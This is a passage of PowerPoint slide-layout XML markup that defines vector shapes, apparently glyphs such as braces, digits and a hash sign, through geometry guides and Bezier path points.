              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3032" y="1108"/>
                <a:ext cx="77" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 21 w 63"/>
                  <a:gd name="T3" fmla="*/ 198 h 241"/>
                  <a:gd name="T4" fmla="*/ 21 w 63"/>
                  <a:gd name="T5" fmla="*/ 157 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 128 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 112 h 241"/>
                  <a:gd name="T10" fmla="*/ 21 w 63"/>
                  <a:gd name="T11" fmla="*/ 83 h 241"/>
                  <a:gd name="T12" fmla="*/ 21 w 63"/>
                  <a:gd name="T13" fmla="*/ 43 h 241"/>
                  <a:gd name="T14" fmla="*/ 63 w 63"/>
                  <a:gd name="T15" fmla="*/ 0 h 241"/>
                  <a:gd name="T16" fmla="*/ 63 w 63"/>
                  <a:gd name="T17" fmla="*/ 18 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 45 h 241"/>
                  <a:gd name="T20" fmla="*/ 42 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 121 h 241"/>
                  <a:gd name="T26" fmla="*/ 42 w 63"/>
                  <a:gd name="T27" fmla="*/ 156 h 241"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 195 h 241"/>
                  <a:gd name="T30" fmla="*/ 46 w 63"/>
                  <a:gd name="T31" fmla="*/ 217 h 241"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 223 h 241"/>
                  <a:gd name="T34" fmla="*/ 63 w 63"/>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241">
                    <a:moveTo>
                      <a:pt x="63" y="241"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="240"/>
                      <a:pt x="21" y="226"/>
                      <a:pt x="21" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="157"/>
                      <a:pt x="21" y="157"/>
                      <a:pt x="21" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="139"/>
                      <a:pt x="14" y="129"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="112"/>
                      <a:pt x="21" y="102"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="15"/>
                      <a:pt x="35" y="0"/>
                      <a:pt x="63" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="18"/>
                      <a:pt x="63" y="18"/>
                      <a:pt x="63" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="18"/>
                      <a:pt x="42" y="27"/>
                      <a:pt x="42" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="85"/>
                      <a:pt x="42" y="85"/>
                      <a:pt x="42" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="104"/>
                      <a:pt x="35" y="116"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="121"/>
                      <a:pt x="21" y="121"/>
                      <a:pt x="21" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="125"/>
                      <a:pt x="42" y="136"/>
                      <a:pt x="42" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="46" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="221"/>
                      <a:pt x="55" y="223"/>
                      <a:pt x="63" y="223"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="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417"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140" y="1108"/>
                <a:ext cx="77" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 128 h 241"/>
                  <a:gd name="T2" fmla="*/ 42 w 64"/>
                  <a:gd name="T3" fmla="*/ 157 h 241"/>
                  <a:gd name="T4" fmla="*/ 42 w 64"/>
                  <a:gd name="T5" fmla="*/ 198 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 241 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 223 h 241"/>
                  <a:gd name="T10" fmla="*/ 17 w 64"/>
                  <a:gd name="T11" fmla="*/ 217 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 64"/>
                  <a:gd name="T15" fmla="*/ 156 h 241"/>
                  <a:gd name="T16" fmla="*/ 43 w 64"/>
                  <a:gd name="T17" fmla="*/ 121 h 241"/>
                  <a:gd name="T18" fmla="*/ 43 w 64"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 64"/>
                  <a:gd name="T23" fmla="*/ 45 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 64"/>
                  <a:gd name="T25" fmla="*/ 18 h 241"/>
                  <a:gd name="T26" fmla="*/ 0 w 64"/>
                  <a:gd name="T27" fmla="*/ 0 h 241"/>
                  <a:gd name="T28" fmla="*/ 42 w 64"/>
                  <a:gd name="T29" fmla="*/ 43 h 241"/>
                  <a:gd name="T30" fmla="*/ 42 w 64"/>
                  <a:gd name="T31" fmla="*/ 83 h 241"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 112 h 241"/>
                  <a:gd name="T34" fmla="*/ 64 w 64"/>
                  <a:gd name="T35" fmla="*/ 1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41">
                    <a:moveTo>
                      <a:pt x="64" y="128"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="129"/>
                      <a:pt x="42" y="139"/>
                      <a:pt x="42" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="198"/>
                      <a:pt x="42" y="198"/>
                      <a:pt x="42" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="226"/>
                      <a:pt x="28" y="240"/>
                      <a:pt x="0" y="241"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="223"/>
                      <a:pt x="14" y="221"/>
                      <a:pt x="17" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="212"/>
                      <a:pt x="22" y="205"/>
                      <a:pt x="22" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="156"/>
                      <a:pt x="22" y="156"/>
                      <a:pt x="22" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="136"/>
                      <a:pt x="29" y="125"/>
                      <a:pt x="43" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="120"/>
                      <a:pt x="43" y="120"/>
                      <a:pt x="43" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="116"/>
                      <a:pt x="22" y="104"/>
                      <a:pt x="22" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="27"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="0" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="42" y="15"/>
                      <a:pt x="42" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="102"/>
                      <a:pt x="49" y="112"/>
                      <a:pt x="64" y="112"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="6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418"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3248"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2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1" y="6"/>
                      <a:pt x="56"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420"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3395"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21"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3590" y="1104"/>
              <a:ext cx="156" cy="248"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 128 w 128"/>
                <a:gd name="T1" fmla="*/ 100 h 203"/>
                <a:gd name="T2" fmla="*/ 123 w 128"/>
                <a:gd name="T3" fmla="*/ 144 h 203"/>
                <a:gd name="T4" fmla="*/ 111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1" y="157"/>
                    <a:pt x="116" y="167"/>
                    <a:pt x="111" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="185"/>
                    <a:pt x="98" y="191"/>
                    <a:pt x="90" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="200"/>
                    <a:pt x="73" y="203"/>
                    <a:pt x="62" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="203"/>
                    <a:pt x="44" y="200"/>
                    <a:pt x="36" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="192"/>
                    <a:pt x="22" y="185"/>
                    <a:pt x="16" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="169"/>
                    <a:pt x="7" y="159"/>
                    <a:pt x="4" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="134"/>
                    <a:pt x="0" y="121"/>
                    <a:pt x="0" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="88"/>
                    <a:pt x="2" y="73"/>
                    <a:pt x="5" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="47"/>
                    <a:pt x="12" y="36"/>
                    <a:pt x="17" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="18"/>
                    <a:pt x="30" y="11"/>
                    <a:pt x="38" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="2"/>
                    <a:pt x="56" y="0"/>
                    <a:pt x="66" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="0"/>
                    <a:pt x="128" y="33"/>
                    <a:pt x="128" y="100"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="105" y="102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="47"/>
                    <a:pt x="92"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22"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3788"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23"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3938"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24"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4085"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7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7"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5"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4284" y="1103"/>
              <a:ext cx="82"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6"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4433" y="1103"/>
              <a:ext cx="82"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7"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4581"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8"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4779"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29"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4926"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30"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5125"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1"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5261" y="1108"/>
              <a:ext cx="188" cy="218"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 188 w 188"/>
                <a:gd name="T1" fmla="*/ 67 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 188"/>
                <a:gd name="T3" fmla="*/ 85 h 218"/>
                <a:gd name="T4" fmla="*/ 142 w 188"/>
                <a:gd name="T5" fmla="*/ 85 h 218"/>
                <a:gd name="T6" fmla="*/ 131 w 188"/>
                <a:gd name="T7" fmla="*/ 135 h 218"/>
                <a:gd name="T8" fmla="*/ 177 w 188"/>
                <a:gd name="T9" fmla="*/ 135 h 218"/>
                <a:gd name="T10" fmla="*/ 173 w 188"/>
                <a:gd name="T11" fmla="*/ 152 h 218"/>
                <a:gd name="T12" fmla="*/ 127 w 188"/>
                <a:gd name="T13" fmla="*/ 152 h 218"/>
                <a:gd name="T14" fmla="*/ 112 w 188"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 92 w 188"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 106 w 188"/>
                <a:gd name="T19" fmla="*/ 152 h 218"/>
                <a:gd name="T20" fmla="*/ 64 w 188"/>
                <a:gd name="T21" fmla="*/ 152 h 218"/>
                <a:gd name="T22" fmla="*/ 50 w 188"/>
                <a:gd name="T23" fmla="*/ 218 h 218"/>
                <a:gd name="T24" fmla="*/ 30 w 188"/>
                <a:gd name="T25" fmla="*/ 218 h 218"/>
                <a:gd name="T26" fmla="*/ 43 w 188"/>
                <a:gd name="T27" fmla="*/ 152 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 188"/>
                <a:gd name="T29" fmla="*/ 152 h 218"/>
                <a:gd name="T30" fmla="*/ 3 w 188"/>
                <a:gd name="T31" fmla="*/ 135 h 218"/>
                <a:gd name="T32" fmla="*/ 48 w 188"/>
                <a:gd name="T33" fmla="*/ 135 h 218"/>
                <a:gd name="T34" fmla="*/ 58 w 188"/>
                <a:gd name="T35" fmla="*/ 85 h 218"/>
                <a:gd name="T36" fmla="*/ 11 w 188"/>
                <a:gd name="T37" fmla="*/ 85 h 218"/>
                <a:gd name="T38" fmla="*/ 15 w 188"/>
                <a:gd name="T39" fmla="*/ 67 h 218"/>
                <a:gd name="T40" fmla="*/ 61 w 188"/>
                <a:gd name="T41" fmla="*/ 67 h 218"/>
                <a:gd name="T42" fmla="*/ 75 w 188"/>
                <a:gd name="T43" fmla="*/ 0 h 218"/>
                <a:gd name="T44" fmla="*/ 95 w 188"/>
                <a:gd name="T45" fmla="*/ 0 h 218"/>
                <a:gd name="T46" fmla="*/ 82 w 188"/>
                <a:gd name="T47" fmla="*/ 67 h 218"/>
                <a:gd name="T48" fmla="*/ 123 w 188"/>
                <a:gd name="T49" fmla="*/ 67 h 218"/>
                <a:gd name="T50" fmla="*/ 138 w 188"/>
                <a:gd name="T51" fmla="*/ 0 h 218"/>
                <a:gd name="T52" fmla="*/ 159 w 188"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 145 w 188"/>
                <a:gd name="T55" fmla="*/ 67 h 218"/>
                <a:gd name="T56" fmla="*/ 188 w 188"/>
                <a:gd name="T57" fmla="*/ 67 h 218"/>
                <a:gd name="T58" fmla="*/ 121 w 188"/>
                <a:gd name="T59" fmla="*/ 85 h 218"/>
                <a:gd name="T60" fmla="*/ 78 w 188"/>
                <a:gd name="T61" fmla="*/ 85 h 218"/>
                <a:gd name="T62" fmla="*/ 67 w 188"/>
                <a:gd name="T63" fmla="*/ 135 h 218"/>
                <a:gd name="T64" fmla="*/ 110 w 188"/>
                <a:gd name="T65" fmla="*/ 135 h 218"/>
                <a:gd name="T66" fmla="*/ 121 w 188"/>
                <a:gd name="T67" fmla="*/ 8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18">
                  <a:moveTo>
                    <a:pt x="188" y="67"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="184" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="67"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="121" y="85"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12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32"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5478"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5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33"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5904" y="1103"/>
              <a:ext cx="82"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4"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6051" y="1104"/>
              <a:ext cx="156" cy="248"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 128 w 128"/>
                <a:gd name="T1" fmla="*/ 100 h 203"/>
                <a:gd name="T2" fmla="*/ 124 w 128"/>
                <a:gd name="T3" fmla="*/ 144 h 203"/>
                <a:gd name="T4" fmla="*/ 111 w 128"/>
                <a:gd name="T5" fmla="*/ 176 h 203"/>
                <a:gd name="T6" fmla="*/ 90 w 128"/>
                <a:gd name="T7" fmla="*/ 196 h 203"/>
                <a:gd name="T8" fmla="*/ 62 w 128"/>
                <a:gd name="T9" fmla="*/ 203 h 203"/>
                <a:gd name="T10" fmla="*/ 36 w 128"/>
                <a:gd name="T11" fmla="*/ 196 h 203"/>
                <a:gd name="T12" fmla="*/ 17 w 128"/>
                <a:gd name="T13" fmla="*/ 177 h 203"/>
                <a:gd name="T14" fmla="*/ 5 w 128"/>
                <a:gd name="T15" fmla="*/ 147 h 203"/>
                <a:gd name="T16" fmla="*/ 0 w 128"/>
                <a:gd name="T17" fmla="*/ 105 h 203"/>
                <a:gd name="T18" fmla="*/ 5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5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7" y="131"/>
                    <a:pt x="124" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="157"/>
                    <a:pt x="116" y="167"/>
                    <a:pt x="111" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="185"/>
                    <a:pt x="98" y="191"/>
                    <a:pt x="90" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="200"/>
                    <a:pt x="73" y="203"/>
                    <a:pt x="62" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="203"/>
                    <a:pt x="44" y="200"/>
                    <a:pt x="36" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="192"/>
                    <a:pt x="22" y="185"/>
                    <a:pt x="17" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="169"/>
                    <a:pt x="7" y="159"/>
                    <a:pt x="5" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="134"/>
                    <a:pt x="0" y="121"/>
                    <a:pt x="0" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="88"/>
                    <a:pt x="2" y="73"/>
                    <a:pt x="5" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="47"/>
                    <a:pt x="12" y="36"/>
                    <a:pt x="17" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="18"/>
                    <a:pt x="30" y="11"/>
                    <a:pt x="38" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="2"/>
                    <a:pt x="56" y="0"/>
                    <a:pt x="66" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="0"/>
                    <a:pt x="128" y="33"/>
                    <a:pt x="128" y="100"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="105" y="102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="47"/>
                    <a:pt x="92" y="19"/>
                    <a:pt x="65" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="19"/>
                    <a:pt x="23" y="47"/>
                    <a:pt x="23" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="157"/>
                    <a:pt x="37" y="183"/>
                    <a:pt x="65" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92"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35"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6250" y="1103"/>
              <a:ext cx="81" cy="244"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 67 w 67"/>
                <a:gd name="T1" fmla="*/ 200 h 200"/>
                <a:gd name="T2" fmla="*/ 45 w 67"/>
                <a:gd name="T3" fmla="*/ 200 h 200"/>
                <a:gd name="T4" fmla="*/ 45 w 67"/>
                <a:gd name="T5" fmla="*/ 31 h 200"/>
                <a:gd name="T6" fmla="*/ 37 w 67"/>
                <a:gd name="T7" fmla="*/ 37 h 200"/>
                <a:gd name="T8" fmla="*/ 26 w 67"/>
                <a:gd name="T9" fmla="*/ 43 h 200"/>
                <a:gd name="T10" fmla="*/ 13 w 67"/>
                <a:gd name="T11" fmla="*/ 49 h 200"/>
                <a:gd name="T12" fmla="*/ 0 w 67"/>
                <a:gd name="T13" fmla="*/ 54 h 200"/>
                <a:gd name="T14" fmla="*/ 0 w 67"/>
                <a:gd name="T15" fmla="*/ 31 h 200"/>
                <a:gd name="T16" fmla="*/ 15 w 67"/>
                <a:gd name="T17" fmla="*/ 26 h 200"/>
                <a:gd name="T18" fmla="*/ 31 w 67"/>
                <a:gd name="T19" fmla="*/ 18 h 200"/>
                <a:gd name="T20" fmla="*/ 47 w 67"/>
                <a:gd name="T21" fmla="*/ 9 h 200"/>
                <a:gd name="T22" fmla="*/ 59 w 67"/>
                <a:gd name="T23" fmla="*/ 0 h 200"/>
                <a:gd name="T24" fmla="*/ 67 w 67"/>
                <a:gd name="T25" fmla="*/ 0 h 200"/>
                <a:gd name="T26" fmla="*/ 67 w 67"/>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00">
                  <a:moveTo>
                    <a:pt x="67" y="200"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="200"/>
                    <a:pt x="45" y="200"/>
                    <a:pt x="45" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="31"/>
                    <a:pt x="45" y="31"/>
                    <a:pt x="45" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="32"/>
                    <a:pt x="41" y="34"/>
                    <a:pt x="37" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="39"/>
                    <a:pt x="30" y="41"/>
                    <a:pt x="26" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="46"/>
                    <a:pt x="18" y="48"/>
                    <a:pt x="13" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="51"/>
                    <a:pt x="4" y="53"/>
